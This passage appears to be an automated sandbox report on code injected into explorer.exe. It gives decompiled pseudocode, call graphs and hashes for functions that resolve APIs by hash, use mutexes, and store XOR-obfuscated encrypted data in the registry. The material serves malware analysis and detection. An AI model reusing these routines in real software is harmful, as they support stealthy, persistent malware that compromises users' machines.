        • Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
        • Opcode Fuzzy Hash: 01e05b04571f0131e572c1f06dd854ee0ee8cafdd31eb164378ba48f19f2f3a3
        • Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 458 8be9b-8bec3 RegOpenKeyExA 459 8bec9-8bee6 RegQueryValueExA 458->459 460 8bec5-8bec7 458->460 462 8bee8-8bef7 call 88604 459->462 463 8bf21-8bf24 459->463 461 8bf33-8bf36 460->461 462->463 468 8bef9-8bf13 RegQueryValueExA 462->468 464 8bf31 463->464 465 8bf26-8bf2e RegCloseKey 463->465 464->461 465->464 468->463 469 8bf15-8bf1a 468->469 469->463 470 8bf1c-8bf1f 469->470 470->463
        C-Code - Quality: 100%
        			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
        				void* _v8;
        				int _v12;
        				int _v16;
        				intOrPtr* _t43;
        				char* _t46;
        
        				_t46 = 0;
        				_v8 = 0;
        				_v16 = 0;
        				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
        					return 0;
        				}
        				_v12 = 0;
        				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
        					_t46 = E00088604(_v12 + 1);
        					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
        						_t43 = _a12;
        						if(_t43 != 0) {
        							 *_t43 = _v12;
        						}
        					}
        				}
        				if(_v8 != 0) {
        					RegCloseKey(_v8);
        				}
        				return _t46;
        			}

        APIs
        • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,0133FC08,00000000,?,00000002), ref: 0008BEBE
        • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
        • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
        • RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: QueryValue$CloseOpen
        • String ID:
        • API String ID: 1586453840-0
        • Opcode ID: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
        • Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
        • Opcode Fuzzy Hash: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
        • Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 78%
        			E00085631(void* __edx, void* __edi) {
        				char _v44;
        				void* _t8;
        				intOrPtr _t11;
        				intOrPtr _t14;
        				intOrPtr _t17;
        				intOrPtr _t18;
        				void* _t20;
        				void* _t33;
        				void* _t34;
        				void* _t36;
        				void* _t39;
        				void* _t40;
        				void* _t49;
        				void* _t54;
        
        				_t54 = __edi;
        				_t8 = E00089E66(0x3b); // executed
        				if(_t8 != 0xffffffff) {
        					L2:
        					E0008980C(0x9e6c8);
        					_t39 = 0x37; // executed
        					E00089F06(_t39);
        					_t11 =  *0x9e688; // 0xb0000
        					_t40 = 0x3a; // executed
        					E00089F06(_t40); // executed
        					E0008E4C1(_t63);
        					_t14 =  *0x9e688; // 0xb0000
        					_t41 =  &_v44;
        					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
        					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
        					_t17 =  *0x9e684; // 0x133f8f0
        					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
        					 *0x9e74c = _t18;
        					if(_t18 != 0) {
        						_t20 = CreateMutexA(0, 0, 0);
        						 *0x9e76c = _t20;
        						__eflags = _t20;
        						if(_t20 != 0) {
        							_t34 = E00088604(0x1000);
        							_t52 = 0;
        							 *0x9e770 = _t34;
        							_t49 =  *0x9e774; // 0x2
        							__eflags = _t34;
        							_t41 =  !=  ? 0 : _t49;
        							__eflags = _t41;
        							 *0x9e774 = _t41; // executed
        						}
        						E0008153B(_t41, _t52); // executed
        						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
        						E00083017(); // executed
        						E000831C2(0, __eflags); // executed
        						E000829B1(); // executed
        						E00083BB2(_t54, __eflags); // executed
        						while(1) {
        							__eflags =  *0x9e758; // 0x0
        							if(__eflags != 0) {
        								break;
        							}
        							E0008980C(0x9e750);
        							_push(0x9e750);
        							_push(0x9e750); // executed
        							E0008279B();
        							Sleep(0xfa0);
        						}
        						E00083D34();
        						E00089A8E();
        						E000834CB();
        						_t33 = 0;
        						__eflags = 0;
        					} else {
        						goto L3;
        					}
        				} else {
        					_t36 = E00082DCB();
        					_t63 = _t36;
        					if(_t36 != 0) {
        						L3:
        						_t33 = 1;
        					} else {
        						goto L2;
        					}
        				}
        				return _t33;
        			}

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0
          • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
          • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
        • Sleep.KERNELBASE(00000FA0), ref: 0008574A
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
        • String ID: fYNa
        • API String ID: 3249252070-137056697
        • Opcode ID: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
        • Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
        • Opcode Fuzzy Hash: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
        • Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 521 8dfad-8dfc4 522 8e021 521->522 523 8dfc6-8dfee 521->523 524 8e023-8e027 522->524 523->522 525 8dff0-8e013 call 8c379 call 8d400 523->525 530 8e028-8e03f 525->530 531 8e015-8e01f 525->531 532 8e041-8e049 530->532 533 8e095-8e097 530->533 531->522 531->525 532->533 534 8e04b 532->534 533->524 535 8e04d-8e053 534->535 536 8e063-8e074 535->536 537 8e055-8e057 535->537 539 8e079-8e085 LoadLibraryA 536->539 540 8e076-8e077 536->540 537->536 538 8e059-8e061 537->538 538->535 538->536 539->522 541 8e087-8e091 GetProcAddress 539->541 540->539 541->522 542 8e093 541->542 542->524
        C-Code - Quality: 100%
        			E0008DFAD(void* __ecx, intOrPtr __edx) {
        				signed int _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v92;
        				intOrPtr _t41;
        				signed int _t47;
        				signed int _t49;
        				signed int _t51;
        				void* _t56;
        				struct HINSTANCE__* _t58;
        				_Unknown_base(*)()* _t59;
        				intOrPtr _t60;
        				void* _t62;
        				intOrPtr _t63;
        				void* _t69;
        				char _t70;
        				void* _t75;
        				CHAR* _t80;
        				void* _t82;
        
        				_t75 = __ecx;
        				_v12 = __edx;
        				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
        				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
        				if(_t41 == 0) {
        					L4:
        					return 0;
        				}
        				_t62 = _t41 + __ecx;
        				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
        				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
        				_t63 =  *((intOrPtr*)(_t62 + 0x18));
        				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
        				_t47 = 0;
        				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
        				_v8 = 0;
        				_v16 = _t63;
        				if(_t63 == 0) {
        					goto L4;
        				} else {
        					goto L2;
        				}
        				while(1) {
        					L2:
        					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
        					_t51 = _v8;
        					if((_t49 ^ 0x218fe95b) == _v12) {
        						break;
        					}
        					_t73 = _v20;
        					_t47 = _t51 + 1;
        					_v8 = _t47;
        					if(_t47 < _v16) {
        						continue;
        					}
        					goto L4;
        				}
        				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
        				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
        				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
        					return _t80;
        				} else {
        					_t56 = 0;
        					while(1) {
        						_t70 = _t80[_t56];
        						if(_t70 == 0x2e || _t70 == 0) {
        							break;
        						}
        						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
        						_t56 = _t56 + 1;
        						if(_t56 < 0x40) {
        							continue;
        						}
        						break;
        					}
        					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
        					 *((char*)(_t82 + _t56 - 0x54)) = 0;
        					if( *((char*)(_t56 + _t80)) != 0) {
        						_t80 =  &(( &(_t80[1]))[_t56]);
        					}
        					_t40 =  &_v92; // 0x6c6c642e
        					_t58 = LoadLibraryA(_t40); // executed
        					if(_t58 == 0) {
        						goto L4;
        					}
        					_t59 = GetProcAddress(_t58, _t80);
        					if(_t59 == 0) {
        						goto L4;
        					}
        					return _t59;
        				}
        			}

        APIs
        • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
        • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: .dll
        • API String ID: 2574300362-2738580789
        • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
        • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
        • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
        • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 543 89b43-89b75 call 88604 546 89b7e-89b9e call 8b5f6 543->546 547 89b77-89b79 543->547 551 89ba0 546->551 552 89ba3-89bb8 call 895c7 546->552 548 89e1a-89e1e 547->548 551->552 555 89cee-89cfb 552->555 556 89bbe-89bd6 552->556 557 89d3c-89d4c call 89292 555->557 558 89cfd-89d1e 555->558 563 89ceb 556->563 564 89bdc-89bf8 556->564 567 89d4f-89d51 557->567 565 89d20-89d3a call 89292 558->565 566 89d54-89d74 call 885c2 RegOpenKeyExA 558->566 563->555 564->566 573 89bfe-89c18 call 89292 564->573 565->567 574 89dc8-89dcd 566->574 575 89d76-89d8b RegCreateKeyA 566->575 567->566 580 89d8d-89db2 call 8861a memset call 8861a 573->580 582 89c1e-89c36 573->582 577 89dcf 574->577 578 89dd5 574->578 579 89dba-89dbf 575->579 575->580 577->578 585 89dd8-89df4 call 8c379 578->585 583 89dc1 579->583 584 89dc3-89dc6 579->584 580->579 592 89c38-89c7c call 895e1 call 892e5 call 885d5 call 89256 582->592 593 89cab-89cb0 582->593 583->584 584->585 599 89e0b-89e18 call 8861a 585->599 600 89df6-89e09 585->600 615 89c8b-89ca9 call 8861a * 2 592->615 616 89c7e-89c83 592->616 598 89cb6-89ce9 call 89292 call 8861a 593->598 598->566 599->548 600->599 600->600 615->598 616->615 618 89c85 616->618 618->615
        C-Code - Quality: 89%
        			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
        				void* _v8;
        				int _v12;
        				void* _v16;
        				void* _v20;
        				int _v24;
        				void* _v28;
        				char _v32;
        				char _v36;
        				int* _v40;
        				int** _v44;
        				void _v108;
        				int* _t90;
        				void* _t91;
        				char* _t92;
        				long _t96;
        				int* _t97;
        				intOrPtr _t98;
        				int* _t101;
        				long _t111;
        				int* _t112;
        				intOrPtr _t122;
        				char* _t125;
        				intOrPtr _t126;
        				intOrPtr _t128;
        				int* _t129;
        				intOrPtr _t131;
        				int* _t133;
        				intOrPtr _t134;
        				int* _t135;
        				intOrPtr _t136;
        				char* _t139;
        				int _t143;
        				int _t147;
        				intOrPtr _t148;
        				int* _t149;
        				int* _t154;
        				int** _t155;
        				int* _t161;
        				int* _t163;
        				intOrPtr _t164;
        				intOrPtr _t171;
        				int _t176;
        				char* _t177;
        				char* _t178;
        				char _t179;
        				void* _t180;
        				void* _t181;
        				void* _t183;
        
        				_t176 = 0;
        				_v24 = __edx;
        				_t177 = 0;
        				_v32 = __ecx;
        				_v28 = 0;
        				_v8 = 0x80000001;
        				_v20 = 0;
        				_t155 = E00088604(0x110);
        				_v44 = _t155;
        				if(_t155 != 0) {
        					_t158 = _a4;
        					_t155[0x42] = _a4;
        					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
        					_t161 = _v108;
        					__eflags = _t161 - 0x61 - 0x19;
        					_t90 = _t161;
        					if(_t161 - 0x61 <= 0x19) {
        						_t90 = _t90 - 0x20;
        						__eflags = _t90;
        					}
        					_v108 = _t90;
        					_t91 = E000895C7(0x4d2);
        					_t163 = _v24;
        					_v16 = _t91;
        					__eflags = _t163;
        					if(_t163 == 0) {
        						L16:
        						_t164 =  *0x9e688; // 0xb0000
        						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
        						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
        							_push(_t176);
        							_push( &_v108);
        							_push("\\");
        							_t92 = E00089292(_t91);
        							_t181 = _t181 + 0x10;
        							L20:
        							_t177 = _t92;
        							_v20 = _t177;
        							goto L21;
        						}
        						_v24 = _t176;
        						_v8 = 0x80000003;
        						_t122 =  *0x9e68c; // 0x133fab8
        						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
        						__eflags = _v24 - _t177;
        						if(_v24 == _t177) {
        							goto L21;
        						}
        						_push(_t176);
        						_push( &_v108);
        						_t125 = "\\";
        						_push(_t125);
        						_push(_v16);
        						_push(_t125);
        						_t92 = E00089292(_v24);
        						_t181 = _t181 + 0x18;
        						goto L20;
        					} else {
        						_t126 =  *0x9e688; // 0xb0000
        						_t128 =  *0x9e68c; // 0x133fab8
        						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
        						__eflags = _t129;
        						if(_t129 != 0) {
        							_t91 = _v16;
        							goto L16;
        						}
        						_v12 = _t176;
        						_t131 =  *0x9e68c; // 0x133fab8
        						_v8 = 0x80000003;
        						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
        						__eflags = _v12 - _t177;
        						if(_v12 == _t177) {
        							L21:
        							E000885C2( &_v16);
        							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
        							__eflags = _t96;
        							if(_t96 == 0) {
        								_t97 = _a8;
        								__eflags = _t97;
        								if(_t97 != 0) {
        									 *_t97 = 1;
        								}
        								_push(_v28);
        								L30:
        								_t98 =  *0x9e68c; // 0x133fab8
        								 *((intOrPtr*)(_t98 + 0x1c))();
        								_t155[0x43] = _v8;
        								_t101 = E0008C379(_t177);
        								 *_t155 = _t101;
        								__eflags = _t101;
        								if(_t101 == 0) {
        									L32:
        									E0008861A( &_v20, 0xffffffff);
        									return _t155;
        								} else {
        									goto L31;
        								}
        								do {
        									L31:
        									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
        									_t176 = _t176 + 1;
        									__eflags = _t176 -  *_t155;
        								} while (_t176 <  *_t155);
        								goto L32;
        							}
        							_v16 = _t176;
        							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
        							__eflags = _t111;
        							if(_t111 == 0) {
        								_t112 = _a8;
        								__eflags = _t112;
        								if(_t112 != 0) {
        									 *_t112 = _t176;
        								}
        								_push(_v16);
        								goto L30;
        							}
        							L23:
        							E0008861A( &_v44, 0x110);
        							memset( &_v108, _t176, 0x40);
        							E0008861A( &_v20, 0xffffffff);
        							goto L1;
        						}
        						_push(_t176);
        						_push(_v16);
        						_t178 = "\\";
        						_push(_t178);
        						_t133 = E00089292(_v12);
        						_t181 = _t181 + 0x10;
        						_v40 = _t133;
        						__eflags = _t133;
        						if(_t133 == 0) {
        							goto L23;
        						}
        						_t134 =  *0x9e68c; // 0x133fab8
        						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
        						__eflags = _t135;
        						if(_t135 == 0) {
        							_t136 =  *0x9e68c; // 0x133fab8
        							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
        						} else {
        							_t143 = E000895E1( &_v36, 0x34);
        							_v24 = _t143;
        							_t179 = E000892E5(_v32);
        							_v32 = _t179;
        							E000885D5( &_v24);
        							_t183 = _t181 + 0x18;
        							_t147 = E00089256(_v12);
        							_v24 = _t147;
        							_t148 =  *0x9e68c; // 0x133fab8
        							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
        							__eflags = _t149;
        							if(_t149 == 0) {
        								_t154 = _a12;
        								__eflags = _t154;
        								if(_t154 != 0) {
        									 *_t154 = 1;
        								}
        							}
        							E0008861A( &_v32, 0xfffffffe);
        							E0008861A( &_v24, 0xfffffffe);
        							_t181 = _t183 + 0x10;
        							_t178 = "\\";
        						}
        						_t139 = E00089292(_v12);
        						_t171 =  *0x9e684; // 0x133f8f0
        						_t181 = _t181 + 0x18;
        						_t177 = _t139;
        						_v20 = _t177;
        						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
        						E0008861A( &_v40, 0xffffffff);
        						goto L21;
        					}
        				}
        				L1:
        				return 0;
        			}

        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 7a5bdae8416784e85c0cb2d11311cc110e919660312a92c4e400b32489df4c49
        • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
        • Opcode Fuzzy Hash: 7a5bdae8416784e85c0cb2d11311cc110e919660312a92c4e400b32489df4c49
        • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
        				char* _v12;
        				char _v16;
        				int _v20;
        				signed int _v24;
        				intOrPtr _v28;
        				char* _v32;
        				char _v52;
        				char _v64;
        				char _v328;
        				char _v2832;
        				signed int _t48;
        				signed int _t49;
        				char* _t54;
        				long _t73;
        				long _t80;
        				long _t83;
        				void* _t88;
        				char* _t89;
        				intOrPtr _t90;
        				void* _t103;
        				void* _t104;
        				char* _t106;
        				intOrPtr _t107;
        				char _t108;
        
        				_t48 = __ecx;
        				_t89 = __edx;
        				_v24 = __ecx;
        				if(_a4 == 0 || _a8 == 0) {
        					L13:
        					_t49 = _t48 | 0xffffffff;
        					__eflags = _t49;
        					return _t49;
        				} else {
        					_t115 = __edx;
        					if(__edx == 0) {
        						goto L13;
        					}
        					_t107 =  *((intOrPtr*)(__ecx + 0x108));
        					_push(_t107);
        					_t103 = 4;
        					_v12 = __edx;
        					_v28 = E0008D400( &_v12, _t103);
        					_t93 = _t107 + __edx;
        					E00092301(_t107 + __edx,  &_v2832);
        					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
        					_t108 = _a8;
        					_v12 = _t54;
        					_v20 = _t54 + 6 + _t108;
        					_t106 = E00088604(_t54 + 6 + _t108);
        					_v32 = _t106;
        					if(_t106 != 0) {
        						 *_t106 = _a12;
        						_t16 =  &(_t106[6]); // 0x6
        						_t106[1] = 1;
        						_t106[2] = _t108;
        						E000886E1(_t16, _a4, _t108);
        						_t21 = _t108 + 6; // 0x6
        						E000922D3( &_v2832, _t21 + _t106, _v12);
        						_v16 = _t89;
        						_t90 = _v24;
        						_v12 =  *((intOrPtr*)(_t90 + 0x108));
        						_push( &_v52);
        						_t104 = 8;
        						E0008F490( &_v16, _t104);
        						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
        						E0008EB2E(_t106, _v20,  &_v328);
        						_t73 = E00089B0E(_t90);
        						_v12 = _t73;
        						__eflags = _t73;
        						if(_t73 != 0) {
        							E000897A0(_v28,  &_v64, 0x10);
        							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
        							__eflags = _t80;
        							if(_t80 == 0) {
        								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
        								__eflags = _t83;
        								if(_t83 != 0) {
        									_push(0xfffffffc);
        									_pop(0);
        								}
        								RegCloseKey(_a4);
        							} else {
        								_push(0xfffffffd);
        								_pop(0);
        							}
        							E0008861A( &_v12, 0xffffffff);
        						}
        						E0008861A( &_v32, 0);
        						return 0;
        					}
        					_t88 = 0xfffffffe;
        					return _t88;
        				}
        			}

        APIs
          • Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateHeapOpen_ftol2_sse
        • String ID:
        • API String ID: 3756893521-0
        • Opcode ID: d54c1703fe1289286cc4c0b85853d477177f9829347cd8886942ae4bf892e17c
        • Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
        • Opcode Fuzzy Hash: d54c1703fe1289286cc4c0b85853d477177f9829347cd8886942ae4bf892e17c
        • Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 86%
        			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
        				long _v8;
        				void* _v12;
        				void* _t12;
        				void* _t20;
        				void* _t22;
        				union _TOKEN_INFORMATION_CLASS _t28;
        				void* _t31;
        
        				_push(_t22);
        				_push(_t22);
        				_t31 = 0;
        				_t28 = __edx;
        				_t20 = _t22;
        				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
        					L6:
        					_t12 = _t31;
        				} else {
        					_t31 = E00088604(_v8);
        					_v12 = _t31;
        					if(_t31 != 0) {
        						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
        							goto L6;
        						} else {
        							E0008861A( &_v12, _t16);
        							goto L3;
        						}
        					} else {
        						L3:
        						_t12 = 0;
        					}
        				}
        				return _t12;
        			}

        APIs
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
        • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: InformationToken$AllocateErrorHeapLast
        • String ID:
        • API String ID: 2499131667-0
        • Opcode ID: 76e1adf5722fb6614a2b176c5bbd778ca9856826630c0b21538b3f5b23351a75
        • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
        • Opcode Fuzzy Hash: 76e1adf5722fb6614a2b176c5bbd778ca9856826630c0b21538b3f5b23351a75
        • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
        				intOrPtr _t10;
        				void* _t13;
        				void* _t19;
        				signed int _t21;
        				signed int _t22;
        
        				_t13 = __edx;
        				if(__ecx != 0) {
        					_t22 = 0;
        					_t19 = CreateMutexA(0, 1, __ecx);
        					if(_t19 != 0) {
        						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
        							_t22 = 1;
        							 *_a4 = _t19;
        						} else {
        							_t10 =  *0x9e684; // 0x133f8f0
        							 *((intOrPtr*)(_t10 + 0x30))(_t19);
        						}
        					} else {
        						GetLastError();
        						_t22 = 0xffffffff;
        					}
        				} else {
        					_t22 = _t21 | 0xffffffff;
        				}
        				return _t22;
        			}

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
        • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateErrorLastMutex
        • String ID:
        • API String ID: 1925916568-0
        • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
        • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
        • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
        • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0008A471(CHAR* __ecx, void* __edx) {
        				intOrPtr _t8;
        				void* _t16;
        				void* _t17;
        
        				_t16 = __edx; // executed
        				_t17 = CreateMutexA(0, 1, __ecx);
        				if(_t17 != 0) {
        					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
        						_t8 =  *0x9e684; // 0x133f8f0
        						 *((intOrPtr*)(_t8 + 0x30))(_t17);
        						_t17 = 0;
        					}
        					return _t17;
        				}
        				GetLastError();
        				return 0;
        			}

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
        • GetLastError.KERNEL32 ref: 0008A48B
        • GetLastError.KERNEL32 ref: 0008A495
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: ErrorLast$CreateMutex
        • String ID:
        • API String ID: 200418032-0
        • Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
        • Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
        • Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
        • Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 91%
        			E00086DA0(void* __eflags, void* __fp0) {
        				short _v536;
        				WCHAR* _v544;
